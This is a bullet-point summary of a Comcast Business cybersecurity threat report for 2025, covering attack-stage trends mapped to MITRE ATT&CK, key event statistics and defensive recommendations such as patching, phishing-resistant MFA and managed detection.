Comcast Business Cybersecurity Threat Report 2025

Keypoints

• Typical report structure: foreword, executive summary, threat landscape narrative, key data findings, recommended security framework (the “Cybersecurity Prism”), attack-stage mapping tied to MITRE ATT&CK®, SOC case studies, recommendations, and vendor/solution brief (How Comcast Business Can Help).
• Foreword and executive summary: set strategic context—AI and automation reshape both attacks and defense; people remain central to resilience; security is a board-level business risk.
• Threat landscape and methodology sections: describe data sources, mapping to MITRE ATT&CK®, timeframes (June 1, 2024–May 31, 2025), and the blend of Comcast Business telemetry, partner research, and analyst insights used to derive findings.
• Attack-stage chapters: organized into four stages (Identifying Targets & Testing Defenses; Establishing a Foothold; Digging Deeper & Expanding Reach; Playing Out the Endgame) with specific MITRE tactics and sub-techniques highlighted for each phase.
• Key statistics: 34.6 billion events analyzed; 19.5 billion botnet/resource-development events; 9.7 billion drive-by compromise events; 4.7 billion phishing events; 44,069 DDoS events observed; CVEs rising to 40,077 in 2024; 16.7% YoY surge in automated global scanning; workforce gap of ~4.76M and 67% of organizations reporting staffing shortages.
• Notable trend — industrialized resource development: attackers heavily invest in pre-attack setup (domains, SSL, VPS/bulletproof hosting, IAB purchases) and use botnets at massive scale to scan and refine campaigns before payload delivery.
• Notable trend — AI as risk multiplier and defensive accelerator: generative AI (LLMs) lowers attacker skill barriers (e.g., WormGPT-like tooling), enabling higher-volume, more convincing phishing, vishing with voice cloning, and automated malware generation; defenders also deploy AI/ML for anomaly detection and orchestration.
• Evolving initial access vectors: drive-by compromise (T1189) emerges as a top initial access method (nearly 9.8B events), complemented by large-scale phishing (4.7B events) across email, SMS, voice, and collaboration platforms.
• Living-off-the-land (LOTL) and stealthy post-compromise activity: attackers increasingly abuse legitimate OS tools (PowerShell, WMI, command interpreters) and valid accounts to evade signature-based controls and extend dwell time.
• Proxy abuse and masked infrastructure: widespread use of compromised residential devices, botnets, and cloud services as proxy layers (“residential proxies”) to obfuscate origin and enable scalable, rented or sold access.
• DDoS evolution: trend toward short-burst, high-velocity reconnaissance attacks and “carpet bombing” campaigns that spread traffic across many IPs/subnets to stealthily probe defenses; examples include many attacks lasting seconds to minutes (e.g., 405 events
• Recurring weakness — security fundamentals: unpatched systems, open ports, misconfigurations, stale accounts, and poor credential hygiene remain primary enablers for attackers; strong patching, risk-based vulnerability management, and timely deprovisioning are emphasized.
• Human element and workforce constraints: alert fatigue and staffing shortages (67% of orgs reporting gaps) increase risk; investment in automation, AI-augmented MDR, and analyst enablement is essential to reduce burnout and improve detection/response quality.
• Commoditization of attack capabilities: malware-as-a-service, IAB marketplaces, and turnkey tools (including AI-assisted code) mean attackers can rapidly scale operations without deep internal expertise.
• Detection and response priorities: defenders should combine preventative controls (patching, secure email/web gateways, posture management, phishing-resistant MFA) with advanced detection (EDR/NDR), AI-driven behavioral analytics, proactive threat hunting, and 24/7 SOC/MDR to reduce mean time to detect and contain.
• Risk and governance implications: recommend aligning cybersecurity investments to prioritized business risks, applying an AI-aware risk calculus, governing enterprise AI/shadow AI use, and elevating cyber to board-level oversight to balance acceptance, mitigation, and transfer decisions.
• Actionable takeaways: adopt multi-layered defenses (network, cloud, endpoint, identity), enforce phishing-resistant MFA and credential hygiene, implement risk-based vulnerability management, monitor for proxy/IOCs and unusual process behavior, and consider managed SOC/MDR to offset staffing gaps and accelerate response.